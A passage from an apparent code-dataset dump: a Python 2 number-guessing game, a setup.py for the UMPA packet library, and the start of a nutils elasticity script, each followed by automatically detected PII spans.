['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNotFound.co'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPNoContent.co'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'base.Is'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.co'], ['URL', 'glance.context.Re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.se'], ['URL', 'images.Im'], ['URL', 'self.FI'], ['URL', 'self.FI'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'self.serializer.me'], ['URL', 'self.FI'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'self.serializer.me'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.serializer.me'], ['URL', 'self.FI'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'self.serializer.sh'], ['URL', 'self.FI'], ['URL', 'headers.it'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'response.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'response.re'], ['URL', 'self.serializer.sh'], ['URL', 'self.FI'], ['URL', 'self.as'], ['URL', 'response.re'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'self.FI'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.as'], ['URL', 'self.stubs.Se'], ['URL', 'self.serializer.no'], 
['URL', 'glance.api.common.im'], ['URL', 'self.serializer.no'], ['URL', 'self.as'], ['URL', 'image.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.re'], ['URL', 'req.co'], ['URL', 'self.co'], ['URL', 'self.FI'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.as'], ['URL', 'self.stubs.Se'], ['URL', 'self.serializer.no'], ['URL', 'glance.api.common.im'], ['URL', 'self.serializer.no'], ['URL', 'self.as'], ['URL', 'copy.de'], ['URL', 'glance.api.v1.images.red'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'copy.de'], ['URL', 'glance.api.v1.images.red'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'base.Is'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'self.as'], ['URL', 'glance.api.v1.filters.va'], ['URL', 'base.Is'], ['URL', 'self.ma'], ['URL', 'routes.Ma'], ['URL', 'self.se'], ['URL', 'self.ma'], ['URL', 'api.se'], ['URL', 'api.ge'], ['URL', 'models.re'], ['URL', 'self.de'], ['URL', 'models.re'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'image.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'webob.exc.HTTPForbidden.co'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], 
['URL', 'output.bo'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'output.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'utils.ge'], ['URL', 'headers.it'], ['URL', 'request.ge'], ['URL', 'self.as'], ['URL', 'output.st']]" +24,"#!/usr/bin/python +# version 4 +# april 2012 +# this was written by saikia81 and is copyrighted under the GNU general public license 3 +# it was written in notepad++, a program I recommend! +# whitespace ftw! + + +#import random, system and operating system possibilities. +import os, sys +import random, time #time moduele +#pickling for data2file +import cPickle as pickle + + +#introducing the player +def instructions(): + print 'welcome to the guess my number game V4' + print ""I'll think of a number and you have to guess it\n"" + +#making a list of all possible numbers for every dificulty +def list_numbers(): + list_easy = [] + list_medium = [] + list_hard = [] + for n in range(1,101): + list_easy.append(n) + list_medium.append(n) + list_hard.append(n) + for n in range(101,201): + list_medium.append(n) + list_hard.append(n) + for n in range(-201,0): + n += 1 + list_hard.append(n) + return list_easy, list_medium, list_hard + + +#does the player want to change the dificulty +def change_dificulty(dificulty): + if dificulty == None: + dificulty = choose_dificulty() + return dificulty + if raw_input(""do you want to change dificulty? yes/no: "") == 'yes': + dificulty = choose_dificulty() + return dificulty + else: + return dificulty + + +#the dificulty the player wants to choose +def choose_dificulty(): + print '\nwhat dificulty do you want to play in?' + dificulty = raw_input('choose between ""easy"", ""medium"" or ""hard"":\n') + dificulties = 'easy', 'medium', 'hard' + #if anybody tries to be smart: help them get it right + wrong = -1 + if dificulty in dificulties: wrong = 0 + elif dificulty not in dificulties: + wrong += 1 + for n in (1,2,3): + if n == 3: + print ""\nseems like you can't handle choosing a dificulty..."" + dificulty = ""easy"" + time.sleep(2) + print """" + elif (dificulty not in dificulties): + print 'something went wrong!!! please try again\n' + dificulty = raw_input('choose between ""easy"", ""medium"" or ""hard"":\n') + wrong += 1 + elif dificulty in dificulties: + print ""\nalright so let's get started :D\n"" + break + else: + print ""you're doing something wrong! I'll chooce a dificulty for you\a\a\a\a\n"" + dificulty = 'easy' + print ""ERROR: 008"" + time.sleep(2) + else: + print '\a\a\asomething went wrong the program will shutdown.' 
+        print ""ERROR: 009""
+        time.sleep(2.5)
+        sys.exit()
+    return dificulty
+
+#so here a random number will be chosen depending on the dificulty
+def random_number(dificulty, list_easy, list_medium, list_hard):
+    if dificulty == 'easy':
+        NUMBER = random.randrange(100) + 1
+        print ""you have chosen the dificulty easy.""
+        number_range = '1 and 100: '
+        numbers = list_easy
+    elif dificulty == 'medium':
+        NUMBER = random.randrange(200) + 1
+        print ""you have chosen the dificulty medium.""
+        number_range = '1 and 200: '
+        numbers = list_medium
+    elif dificulty == 'hard':
+        NUMBER = random.randrange(-200,201)
+        print ""you have chosen the dificulty hard.""
+        number_range = '-200 and 200: '
+        numbers = list_hard
+    else:
+        print ""dificulty malfunction""
+        print ""ERROR: 003""
+        time.sleep(2.5)
+        exit()
+    return NUMBER, number_range, numbers
+
+# if the guess != ""the (predefined) number"": loop.
+def game(dificulty, NUMBER, number_range, numbers):
+    time.sleep(2.5)
+    os.system('cls')
+    guesses=0
+    guess='nothing'
+    while guess != NUMBER:
+        if guess == 'nothing':
+            print 'guess a number between', number_range
+            try:
+                guess = input()
+            except:
+                print ""\nsomething went wrong\nyou're getting another try\n\n""
+                continue
+            guesses += 1
+        elif guess == 'cheater':
+            guess = NUMBER
+        elif guess not in numbers:
+            print ""\nthe guess you made isn't in the range of valid numbers.\nAre you sure you want to make this guess?""
+            answ = raw_input(""'yes'/'no' \n"")
+            if answ == 'yes':
+                print ""it's your funeral""
+                print '\nguess a number between', number_range
+                guesses += 1
+            elif answ == 'no':
+                print ""good choice""
+                print '\nguess a number between', number_range
+                try:
+                    guess = input()
+                except:
+                    print ""something went wrong\nyou're getting another try\n""
+                    continue
+            else:
+                print ""that isn't a valid option""
+                print ""let's continue\n""
+        #if the number is higher than the guess
+        elif guess < NUMBER:
+            print 'higher...'
+            print '\nguess a number between', number_range
+            try:
+                guess = input()
+            except:
+                print ""something went wrong\nyou're getting another try\n""
+                continue
+            guesses += 1
+            continue
+        #if the number is 'lower...'
+        elif guess > NUMBER:
+            print 'lower...'
+            print '\nguess a number between', number_range
+            try:
+                guess = input()
+            except:
+                print ""something went wrong\n you'll get another try""
+                continue
+            guesses += 1
+        #this is actually an error that will never occur... but better safe than sorry.
+        else:
+            print '\a\a\asorry, something went wrong. The game will now end itself.'
+            sys.exit()
+    print
+    print 'you did it the NUMBER was: ', NUMBER,
+    print 'it cost you ', guesses, 'guesses to get it right', 'on dificulty', dificulty
+    print
+    return guesses
+
+##Here I will use the 'os' module to keep a highscore system
+#in the default appdata of the users profile.
+#everything here is to see if everything is alright in its place.
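+#A minimal sketch (not part of the original game) of the load-or-create
+#pattern that highscore() below implements with cPickle. It assumes a
+#Windows profile where the LOCALAPPDATA environment variable is set;
+#the helper name _open_highscores is hypothetical and unused elsewhere.
+def _open_highscores():
+    folder = os.path.join(os.environ['LOCALAPPDATA'], 'Number_game')
+    if not os.access(folder, 0):
+        #first run: create the save folder
+        os.mkdir(folder)
+    path = folder + '\\highscores.dat'
+    if not os.access(path, 0):
+        #seed the file with one empty score dict per dificulty
+        f = open(path, 'w')
+        pickle.dump([{}, {}, {}], f)
+        f.close()
+    return open(path, 'r')
+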
+def highscore(dificulty,guesses):
+    FOLDER_LOCALAPPDATA = os.environ['LOCALAPPDATA']
+    FOLDER_NUMBER_GAME = FOLDER_LOCALAPPDATA + '\\Number_game'
+    #deciding if a new highscore file and/or dir is needed
+    if os.access(FOLDER_NUMBER_GAME, 0) == False: #dir
+        try:
+            os.mkdir(FOLDER_NUMBER_GAME)
+        except:
+            os.system('cls')
+            print 'creating folder: ERROR\nError code: 002'
+            os.system('pause')
+            sys.exit()
+        try:
+            HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\highscores.dat"", ""w+"")
+            easy_highscores={}
+            medium_highscores={}
+            hard_highscores={}
+            all_highscores = [easy_highscores,medium_highscores,hard_highscores]
+            pickle.dump(all_highscores,HIGHSCORES_DAT)
+            HIGHSCORES_DAT.close()
+            HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\highscores.dat"", ""r+"")
+            unpickled_file = pickle.load(HIGHSCORES_DAT)
+
+        except:
+            os.system('cls')
+            print 'loading file: ERROR\nError code: 001'
+            os.system('pause')
+            sys.exit()
+        else:
+            HIGHSCORES_DAT.close()
+
+
+    #done with file and folder creation
+    #
+    #showing highscores
+
+    HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\highscores.dat"", ""r"")
+    try:
+        unpickled_file = pickle.load(HIGHSCORES_DAT)
+    except:
+        print ""couldn't locate or unpickle file""
+        print ""ERROR: 005""
+        print ""\n if this was your first run of the game: this is common""
+        print ""if not, please send a message at dummy@email.com, thank you""
+        time.sleep(1)
+        print ""everything went worse than expected. shutting down""
+        time.sleep(2.5)
+        sys.exit()
+
+    else:
+        HIGHSCORES_DAT.close()
+
+    if dificulty == ""easy"": l=0
+    if dificulty == ""medium"": l=1
+    if dificulty == ""hard"": l=2
+    highscores = unpickled_file[l]
+
+    #creating your highscore...
+    your_name = raw_input('what is your name?: ')
+    try:
+        if highscores[your_name]>guesses:
+            os.system('cls')
+            print ""congratulations, new highscore!!""
+            if raw_input('do you want to replace your score yes/no: ') ==""yes"": highscores[your_name]=guesses
+    except:
+        print ""new user""
+        highscores[your_name]=guesses
+
+    list_keys= highscores.keys()
+    list_values= highscores.values()
+
+    list_values.sort()
+
+    time.sleep(4)
+    os.system('cls')
+    #deeply annoying part
+    #highscore display
+    print"" ---HIGHSCORE---""
+    print ""highscores in"", dificulty,""dificulty""
+    print""\nname                  attempts""
+    print""----------------------------------------""
+    i=0
+    #for values in sorted values list
+    for n in list_values:
+        #reset found to find next highscore
+        found = False
+        #set p to 0: to try different keys
+        p=0
+        #while the matching key and value not found keep looking
+        while found != True:
+            #m = the next key in list
+            m=list_keys[p]
+            if highscores[m] == n: found=True
+            p+=1
+        #drop the matched key so players with equal scores each get a row
+        list_keys.remove(m)
+        b=len(m)
+        b=21-b
+        print m,' '*b,highscores[m]
+
+    HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\highscores.dat"", ""r"")
+    unpickled_file = pickle.load(HIGHSCORES_DAT)
+    HIGHSCORES_DAT.close()
+    if l==0: unpickled_file[0]=highscores
+    if l==1: unpickled_file[1]=highscores
+    if l==2: unpickled_file[2]=highscores
+    HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\highscores.dat"", ""w"")
+    pickle.dump(unpickled_file,HIGHSCORES_DAT)
+    HIGHSCORES_DAT.close()
+
+def end():
+    time.sleep(1)
+    print('''
+    The number Game V4
+    Copyright (C) 2012 Saikia81
+    ''')
+    time.sleep(5)
+    os.system('cls')
+    print(""""""
+    This program is free software: you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation, either version 3 of the License, or
+    (at your option) any later version.
+ + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + """""") + time.sleep(7) + try: + if pygame.mixer.get_busy()>0: + try: + pygame.mixer.music.fadeout(3000) + except: + print ""ERROR: 012"" + except: + pass + time.sleep(3) + os.system('pause') + sys.exit() + +def main(): + #initializing + ask_music = raw_input('music ""on""?: ') + if (ask_music == 'on') or (ask_music == 'yes'): + try: + import pygame.mixer + pygame.mixer.init() + pygame.mixer.music.load(""song.mp3"") + pygame.mixer.music.play(-1) + except: + print ""pygame not working!\nError: 013"" + os.system('cls') + list_easy, list_medium, list_hard = list_numbers() + dificulty = None + instructions() + while 1: + dificulty=change_dificulty(dificulty) + NUMBER, number_range, numbers = random_number(dificulty, list_easy, list_medium, list_hard) + guesses = game(dificulty, NUMBER, number_range, numbers) + highscore(dificulty,guesses) + + ask_again = raw_input('\ndo you want to play again? yes/no: ') + os.system('cls') + if ask_again == 'no': end() + +#start +main() +",11829,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', 'april 2012'], ['LOCATION', 'list_easy'], ['LOCATION', 'game(dificulty'], ['PERSON', 'list_values= highscores.values'], ['PERSON', 'list_values.sort'], ['DATE_TIME', '2012'], ['LOCATION', 'list_easy'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'os.ac'], ['URL', 'os.mk'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'DAT.cl'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'DAT.cl'], ['URL', 'email.com'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'DAT.cl'], ['URL', 'os.sy'], ['URL', 'highscores.ke'], ['URL', 'highscores.va'], ['URL', 'values.so'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'DAT.cl'], ['URL', 'DAT.cl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'time.sl'], ['URL', 'pygame.mixer.ge'], ['URL', 'pygame.mixer.mu'], ['URL', 'time.sl'], ['URL', 'os.sy'], ['URL', 'pygame.mixer.in'], ['URL', 'pygame.mixer.mu'], ['URL', 'song.mp'], ['URL', 'pygame.mixer.music.pl'], ['URL', 'os.sy'], ['URL', 'os.sy']]" +25,"#!/usr/bin/env python +# -*- coding: utf-8 -*- + +# Copyright (C) 2008-2009 Adriano Monteiro Marques. +# +# Author: Bartosz SKOWRON +# +# This library is free software; you can redistribute it and/or modify +# it under the terms of the GNU Lesser General Public License as published +# by the Free Software Foundation; either version 2.1 of the License, or +# (at your option) any later version. +# +# This library is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY +# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public +# License for more details. 
+# +# You should have received a copy of the GNU Lesser General Public License +# along with this library; if not, write to the Free Software Foundation, +# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + +import glob +import os +import os.path +from stat import ST_MODE +from distutils.core import setup +from distutils.command.install import install + +UMPA_VERSION = '0.2' +SHARE_DIR = os.path.join('share', 'umpa') +DOCS_DIR = os.path.join('share', 'doc', 'umpa') + +TESTS_DIR = [ + os.path.join('tests'), + os.path.join('tests', 'system'), + os.path.join('tests', 'system', 'test_snd'), + os.path.join('tests', 'system', 'test_sndrcv'), + os.path.join('tests', 'a_unit'), + os.path.join('tests', 'a_unit', 'test_extensions'), + os.path.join('tests', 'a_unit', 'test_protocols'), + os.path.join('tests', 'a_unit', 'test_utils'), + os.path.join('tests', 'a_unit', 'test_sniffing'), + os.path.join('tests', 'a_unit', 'test_sniffing', 'test_libpcap'), +] + +class umpa_install(install): + def run(self): + install.run(self) + self.create_uninstaller() + + def create_uninstaller(self): + uninstaller_filename = os.path.join( + self.install_data, SHARE_DIR, 'uninstall_umpa') + uninstaller = [] + uninstaller.append( + ""#!/usr/bin/env python\n"" + ""import os, sys, shutil\n"" + ""\n"" + ""print\n"" + ""print '%(line)s Uninstall UMPA %(version)s %(line)s'\n"" + ""print\n"" + ""\n"" + ""answer = raw_input('Are you sure that you want to '\n"" + "" 'completly uninstall UMPA %(version)s? (yes/no) ')\n"" + ""\n"" + ""if answer.lower() not in ['yes', 'y']:\n"" + "" sys.exit(0)\n"" + ""\n"" + ""print\n"" + ""print '%(line)s Uninstalling UMPA %(version)s... %(line)s'\n"" + ""print\n"" % {'version': UMPA_VERSION, 'line': '-' * 10}) + + for output in self.get_outputs(): + uninstaller.append( + 'print ""Removing %(output)s...""\n' + 'if os.path.exists(""%(output)s""):\n' + ' os.remove(""%(output)s"")\n' % {'output': output}) + + uninstaller.append( + ""print 'Removing uninstaller itself...'\n"" + ""os.remove('%s')\n"" % uninstaller_filename) + + uninstaller.append('print ""Removing empty directories...""\n') + for dir in ( + os.path.join(self.install_data, SHARE_DIR), + os.path.join(self.install_data, DOCS_DIR), + os.path.join(self.install_lib, 'umpa'), + ): + uninstaller.append( + 'if os.path.exists(""%(dir)s""):\n' + ' shutil.rmtree(""%(dir)s"")\n' % {'dir' : dir}) + + uninstaller_file = open(uninstaller_filename, 'w') + uninstaller_file.writelines(uninstaller) + uninstaller_file.close() + + # Set exec bit for uninstaller + mode = ((os.stat(uninstaller_filename)[ST_MODE]) | 0555) & 07777 + os.chmod(uninstaller_filename, mode) + +cmdclasses = { + 'install' : umpa_install, + } + +test_files = [] +for dir in TESTS_DIR: + test_files = test_files + [ (os.path.join(SHARE_DIR, dir), + glob.glob(os.path.join(dir,'*.py')))] + +data_files = [ (os.path.join(SHARE_DIR,'examples'), + glob.glob(os.path.join('examples','*'))), + (os.path.join(DOCS_DIR,'API'), + glob.glob(os.path.join('docs','API','*'))), + (os.path.join(DOCS_DIR,'tutorials','_sources'), + glob.glob(os.path.join('docs','tutorials','_sources','*'))), + (os.path.join(DOCS_DIR,'tutorials','_static'), + glob.glob(os.path.join('docs','tutorials','_static','*'))), + (os.path.join(DOCS_DIR,'tutorials'), + glob.glob(os.path.join('docs','tutorials','*.*'))), + (SHARE_DIR, ('run_tests.sh', 'run_tests.bat')), + (DOCS_DIR, + ('README', 'COPYING', 'AUTHORS', 'TODO', 'CHANGES', + 'INSTALL')), + (os.path.join(SHARE_DIR, 'tests'), + (os.path.join('tests','README'), + 
os.path.join('tests','IMPORTANT'))), + ] + test_files + +setup( name = ""UMPA"", + version = UMPA_VERSION, + description = ""Umit's Manipulations of Packets Art"", + author = ""Bartosz SKOWRON"", + author_email = dummy@email.com"", + url = ""http://www.umpa.umitproject.org"", + license = ""GNU LGPLv2"", + platforms = [""Platform Independent""], + packages = [ ""umit"", + ""umit.umpa"", + ""umit.umpa.protocols"", + ""umit.umpa.sniffing"", + ""umit.umpa.sniffing.libpcap"", + ""umit.umpa.extensions"", + ""umit.umpa.utils"", + ], + data_files = data_files, + cmdclass = cmdclasses, +) +",5889,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'http://www.umpa.umitproject.org'], ['DATE_TIME', '2008-2009'], ['PERSON', 'Adriano Monteiro Marques'], ['PERSON', 'Bartosz SKOWRON'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['PERSON', 'UMPA'], ['LOCATION', 'version)s'], ['PERSON', 'UMPA'], ['LOCATION', 'version)s'], ['PERSON', 'answer.lower'], ['LOCATION', 'version)s'], ['PERSON', 'TODO'], ['PERSON', 'Umit'], ['PERSON', 'Bartosz SKOWRON'], ['URL', 'os.pa'], ['URL', 'distutils.co'], ['URL', 'distutils.command.in'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'install.ru'], ['URL', 'self.cr'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'self.ge'], ['URL', 'os.pa'], ['URL', 'os.re'], ['URL', 'os.re'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'os.path.jo'], ['URL', 'self.in'], ['URL', 'os.pa'], ['URL', 'file.cl'], ['URL', 'os.st'], ['URL', 'os.ch'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'glob.gl'], ['URL', 'os.path.jo'], ['URL', 'tests.sh'], ['URL', 'tests.ba'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'email.com'], ['URL', 'umit.umpa.pro'], ['URL', 'umit.umpa.sn'], ['URL', 'umit.umpa.sniffing.li']]" +26,"#! /usr/bin/env python3 +# +# In this script we solve the linear elasticity problem on a unit square +# domain, clamped at the left boundary, and stretched at the right boundary +# while keeping vertical displacements free. + +from nutils import mesh, function, solver, export, cli, testing + +def main(nelems:int, etype:str, btype:str, degree:int, poisson:float): + ''' + Horizontally loaded linear elastic plate. + + .. arguments:: + + nelems [10] + Number of elements along edge. + etype [square] + Type of elements (square/triangle/mixed). + btype [std] + Type of basis function (std/spline), with availability depending on the + configured element type. + degree [1] + Polynomial degree. + poisson [.25] + Poisson's ratio, nonnegative and strictly smaller than 1/2. 
+ ''' + + domain, geom = mesh.unitsquare(nelems, etype) + + ns = function.Namespace() + ns.x = geom + ns.basis = domain.basis(btype, degree=degree).vector(2) + ns.u_i = 'basis_ni ?lhs_n' + ns.X_i = 'x_i + u_i' + ns.lmbda = 2 * poisson + ns.mu = 1 - 2 * poisson + ns.strain_ij = '(d(u_i, x_j) + d(u_j, x_i)) / 2' + ns.stress_ij = 'lmbda strain_kk δ_ij + 2 mu strain_ij' + + sqr = domain.boundary['left'].integral('u_k u_k J(x)' @ ns, degree=degree*2) + sqr += domain.boundary['right'].integral('(u_0 - .5)^2 J(x)' @ ns, degree=degree*2) + cons = solver.optimize('lhs', sqr, droptol=1e-15) + + res = domain.integral('d(basis_ni, x_j) stress_ij J(x)' @ ns, degree=degree*2) + lhs = solver.solve_linear('lhs', res, constrain=cons) + + bezier = domain.sample('bezier', 5) + X, sxy = bezier.eval(['X', 'stress_01'] @ ns, lhs=lhs) + export.triplot('shear.png', X, sxy, tri=bezier.tri, hull=bezier.hull) + + return cons, lhs + +# If the script is executed (as opposed to imported), :func:`nutils.cli.run` +# calls the main function with arguments provided from the command line. For +# example, to keep with the default arguments simply run :sh:`python3 +# elasticity.py`. To select mixed elements and quadratic basis functions add +# :sh:`python3 elasticity.py etype=mixed degree=2`. + +if 